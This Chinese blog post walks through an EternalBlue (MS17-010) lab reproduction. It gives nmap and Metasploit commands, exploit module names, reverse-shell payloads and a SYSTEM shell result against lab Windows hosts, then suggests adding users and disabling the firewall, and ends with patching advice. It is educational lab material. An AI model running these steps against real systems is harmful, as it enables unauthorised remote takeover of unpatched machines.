一、永恒之藍簡述:
永恒之藍是指2017年4月14日晚,黑客團體Shadow Brokers(影子經紀人)公布一大批網路攻擊工具,其中包含“永恒之藍”工具,“永恒之藍”利用Windows系統的SMB漏洞可以獲取系統最高權限,5月12日,不法分子通過改造“永恒之藍”制作了wannacry勒索病毒,英國、俄羅斯、整個歐洲以及中國國內多個高校校內網、大型企業內網和政府機構專網中招,被勒索支付高額贖金才能解密恢復檔案,
二、SMB服務簡述:
SMB(全稱是Server Message Block)是一個協議名,它能被用于Web連接和客戶端與服務器之間的資訊溝通,埠:445,SMB最初是IBM的貝瑞·費根鮑姆(Barry Feigenbaum)研制的,其目的是將DOS作業系統中的本地檔案介面“中斷13”改造為網路檔案系統,
三、實驗環境:
本次攻擊機器:kali linux,ip:192.168.3.110
靶機兩臺:
windows server 2003,ip:192.168.3.48
windows7,ip:192.168.3.65
四、復現【命令我都標紅了】:
首先攻擊windows7,靶機的window7版本為旗艦版

1.在kaili上使用nmap探測win7的埠資訊:nmap 192.168.3.65,可以看到該機器已開啟445埠,當然也可以查看該445埠的banner資訊,命令 nmap -sV -p445 192.168.3.65【查看下面圖二】

2.使用kali自帶的metasploit,如果是初次使用,先輸入msfconsole進入msf,然后鍵入search ms17_010,查詢對應的模塊

3.可以先探測一下該系統是否存在永恒之藍漏洞,當然也可以批量掃描C段,上面有五個模塊可以選擇,掃描的話使用 auxiliary/scanner/smb/smb_ms17_010,因為里面包含了scanner,鍵入命令 use auxiliary/scanner/smb/smb_ms17_010
查詢該模塊需要的引數,命令 show options,可以看到主要的引數是攻擊的主機RHOSTS,設定引數:set rhosts 192.168.3.65【不分大小寫】,再鍵入show options 即可查看是否成功賦值上,如果寫錯了可以選擇unset rhosts來取消重新選擇

4.使用 run 或者 exploit 命令即可成功查詢,可以看到,Host is likely VULNERABLE to MS17-010!【主機可能容易受到MS17-010的攻擊!】,證明可能存在永恒之藍漏洞,下面開始利用

5.漏洞利用,回到剛才的ms17_010模塊,win7需要使用exploit/windows/smb/ms17_010_eternalblue,windows2003使用exploit/windows/smb/ms17_010_psexec,win8那個沒試過,,
所以我直接use exploit/windows/smb/ms17_010_eternalblue

6.同樣需要show options來查看需要設定的引數,set rhost 192.168.3.65,run 即可,按多兩下回車就可以了,【從第一行可以看到,kali本地監聽的埠為4444】

7.鍵入命令即可,whoami 為system命令,查看 ipconfig 確實是192.168.3.65的ip地址

打開靶機windows7,輸入命令netstat -an 查看,確實本地的64392埠被192.168.3.110:4444監聽,反彈shell成功,接下來可以做一些使用kali建立的shell進行添加用戶,關閉防火墻,遠程3389連接圖形化界面了等等,
至此漏洞復現完畢

8.windows2003的話回到第五步,步驟是一樣的
永恒之藍利用一般有三個結果:
①成功反彈shell,如上述實驗,成功!
②被攻擊的機器藍屏,或者死機
③tightvnc,出現圖形化界面且無法動彈,反彈失敗【這種在選擇了其他不同的payloads導致的,可以查看show payloads,我當初就選了windows/x64/meterpreter/reverse_tcp利用失敗,本次實驗沒有選擇指定的payload,直接利用最原始的】
后來選擇了第三個通用的pyload【generic/shell_reverse_tcp】發現也可以,大家都可以去嘗試一下其他的,

五、漏洞修復:
微軟已于2017 年 發布MS17-010補丁,修復了“永恒之藍”攻擊的系統漏洞,一定要及時更新Windows系統補丁;務必不要輕易打開doc、rtf等后綴的附件;
內網中存在使用相同賬號、密碼情況的機器請盡快修改密碼,未開機的電腦請確認口令修改完畢、補丁安裝完成后再進行聯網操作,可以下載“永恒之藍”漏洞修復工具進行漏洞修復,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/296064.html
標籤:其他
下一篇:PHP反序列化知識點總結
